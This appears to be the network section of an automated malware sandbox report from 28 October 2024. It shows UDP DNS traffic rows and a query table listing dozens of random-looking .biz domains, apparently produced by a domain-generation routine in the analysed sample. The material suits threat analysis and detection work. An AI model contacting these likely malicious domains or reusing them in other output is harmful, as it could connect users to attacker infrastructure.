                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.346066952 CET53623511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.346221924 CET53623511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.838620901 CET5708853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.847137928 CET53570881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.525034904 CET4971153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.534884930 CET53497111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.224611044 CET5240653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.240909100 CET5240653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.324201107 CET53524061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.324506044 CET53524061.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.000179052 CET4971153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.008375883 CET53497111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.882416964 CET5823553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:15.891592979 CET53582351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.572091103 CET5403853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:16.580157042 CET53540381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.429893970 CET5271453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:17.437978029 CET53527141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.273001909 CET4998553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:18.281899929 CET53499851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.085882902 CET6279653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:20.094315052 CET53627961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.534456968 CET5554553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:21.543230057 CET53555451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.220501900 CET5108353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.228643894 CET53510831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.909151077 CET6218753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:22.917493105 CET53621871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.367496014 CET6125153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.397169113 CET6125153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.738147974 CET53612511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:24.738199949 CET53612511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.183563948 CET5437353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.191303015 CET53543731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.885880947 CET5239553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:26.894248962 CET53523951.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.265113115 CET5245553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:29.274249077 CET53524551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.286562920 CET6161853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:30.297322989 CET53616181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.717844963 CET5433053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:31.725974083 CET53543301.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.565366983 CET6180953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.584656000 CET6180953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.592679024 CET53618091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:32.764786005 CET53618091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.120029926 CET6195853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.127774954 CET53619581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.803026915 CET5574853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:34.811053991 CET53557481.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.773544073 CET5933053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.782659054 CET53593301.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.783262014 CET6548053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.803380013 CET6548053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.972095966 CET53654801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:35.972496986 CET53654801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.833779097 CET6267853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:36.850354910 CET6267853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.020433903 CET53626781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.020634890 CET53626781.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.724124908 CET6011153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.733566999 CET53601111.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.611879110 CET6071053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.621171951 CET53607101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.472476959 CET6428253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.490998983 CET6428253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.572206974 CET53642821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.572381020 CET53642821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.424464941 CET5761053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.433012009 CET53576101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.273962021 CET5062153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.282356977 CET53506211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.715226889 CET5615353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.724096060 CET53561531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.567548990 CET6101553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.584938049 CET6101553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.668418884 CET53610151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.668629885 CET53610151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.344449997 CET5661553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.352428913 CET53566151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.039546967 CET6108053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.047836065 CET53610801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.898952007 CET5504953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.907679081 CET53550491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.587510109 CET4933853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.601392031 CET53493381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.461843967 CET5126253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.470410109 CET53512621.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.177464962 CET5546553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.185862064 CET53554651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.104918957 CET6119453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.113341093 CET53611941.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.964350939 CET6471353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.973752022 CET53647131.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.838552952 CET5862853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.849951982 CET53586281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.320836067 CET4954053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.329271078 CET53495401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.580005884 CET5432753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.587981939 CET53543271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.306361914 CET5301753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.314738989 CET53530171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.912970066 CET5176353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.921621084 CET53517631.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.922346115 CET6182553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.931016922 CET53618251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.944669962 CET6182553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.951780081 CET53618251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.791177988 CET5247253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.805684090 CET53524721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.806479931 CET6044853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.814454079 CET53604481.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.815094948 CET5853953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.824181080 CET53585391.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.852785110 CET192.168.2.51.1.1.10x2f78Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.705899954 CET192.168.2.51.1.1.10x587Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.006891012 CET192.168.2.51.1.1.10xaf41Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.904794931 CET192.168.2.51.1.1.10xa669Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.449763060 CET192.168.2.51.1.1.10x6fbaStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.676984072 CET192.168.2.51.1.1.10xd72Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.697407007 CET192.168.2.51.1.1.10x266fStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.595184088 CET192.168.2.51.1.1.10xbb71Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.596829891 CET192.168.2.51.1.1.10x6bfbStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.147089005 CET192.168.2.51.1.1.10x985aStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.156759977 CET192.168.2.51.1.1.10xe1f5Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.680524111 CET192.168.2.51.1.1.10x93eaStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.690089941 CET192.168.2.51.1.1.10xa22cStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.707196951 CET192.168.2.51.1.1.10x76cStandard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.868803024 CET192.168.2.51.1.1.10x823aStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.970679998 CET192.168.2.51.1.1.10xc051Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.751815081 CET192.168.2.51.1.1.10x4390Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.692521095 CET192.168.2.51.1.1.10x6f45Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.600362062 CET192.168.2.51.1.1.10xca64Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.354352951 CET192.168.2.51.1.1.10x290Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.995340109 CET192.168.2.51.1.1.10x55b6Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.219710112 CET192.168.2.51.1.1.10xfe03Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.189018011 CET192.168.2.51.1.1.10x62eeStandard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.309561014 CET192.168.2.51.1.1.10xd361Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.282622099 CET192.168.2.51.1.1.10x28cStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.291156054 CET192.168.2.51.1.1.10xa259Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.448195934 CET192.168.2.51.1.1.10x75a0Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.583786964 CET192.168.2.51.1.1.10x11f5Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.360500097 CET192.168.2.51.1.1.10x14e9Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.736924887 CET192.168.2.51.1.1.10x4e52Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.847632885 CET192.168.2.51.1.1.10xdf55Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.706526041 CET192.168.2.51.1.1.10x4171Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.133127928 CET192.168.2.51.1.1.10x7839Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.247001886 CET192.168.2.51.1.1.10xd1f6Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.026309967 CET192.168.2.51.1.1.10x2199Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.184406042 CET192.168.2.51.1.1.10xfafStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.505151987 CET192.168.2.51.1.1.10x9680Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.115056038 CET192.168.2.51.1.1.10xce63Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.124059916 CET192.168.2.51.1.1.10x55edStandard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.376104116 CET192.168.2.51.1.1.10x2620Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.751931906 CET192.168.2.51.1.1.10x41fbStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.451435089 CET192.168.2.51.1.1.10x181cStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.915152073 CET192.168.2.51.1.1.10x5143Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.038057089 CET192.168.2.51.1.1.10xd69eStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.667340040 CET192.168.2.51.1.1.10x2099Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.145462990 CET192.168.2.51.1.1.10x1066Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.200151920 CET192.168.2.51.1.1.10xd766Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.171866894 CET192.168.2.51.1.1.10x5701Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.040499926 CET192.168.2.51.1.1.10x1220Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.042457104 CET192.168.2.51.1.1.10xf12aStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.964453936 CET192.168.2.51.1.1.10xfb3Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.446038008 CET192.168.2.51.1.1.10x635dStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.635479927 CET192.168.2.51.1.1.10xf29cStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.091511965 CET192.168.2.51.1.1.10x93dcStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825014114 CET192.168.2.51.1.1.10xef31Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.848088980 CET192.168.2.51.1.1.10xb1d7Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.316127062 CET192.168.2.51.1.1.10xbd9bStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.339103937 CET192.168.2.51.1.1.10x4a54Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.823595047 CET192.168.2.51.1.1.10x4a4eStandard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.317483902 CET192.168.2.51.1.1.10xf03cStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.033188105 CET192.168.2.51.1.1.10xeb53Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.885278940 CET192.168.2.51.1.1.10xf03eStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.576380014 CET192.168.2.51.1.1.10xb940Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.600198030 CET192.168.2.51.1.1.10xb940Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.631932020 CET192.168.2.51.1.1.10x9a05Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.621439934 CET192.168.2.51.1.1.10x1a38Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.060237885 CET192.168.2.51.1.1.10x4a68Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.064688921 CET192.168.2.51.1.1.10x814aStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.518876076 CET192.168.2.51.1.1.10x84f9Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.240827084 CET192.168.2.51.1.1.10xb8d1Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.095659018 CET192.168.2.51.1.1.10x4c39Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.115859032 CET192.168.2.51.1.1.10x4c39Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.630945921 CET192.168.2.51.1.1.10xaa11Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.940952063 CET192.168.2.51.1.1.10xcf2fStandard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.635838032 CET192.168.2.51.1.1.10x1f81Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.662869930 CET192.168.2.51.1.1.10x1f81Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.904371977 CET192.168.2.51.1.1.10x7673Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
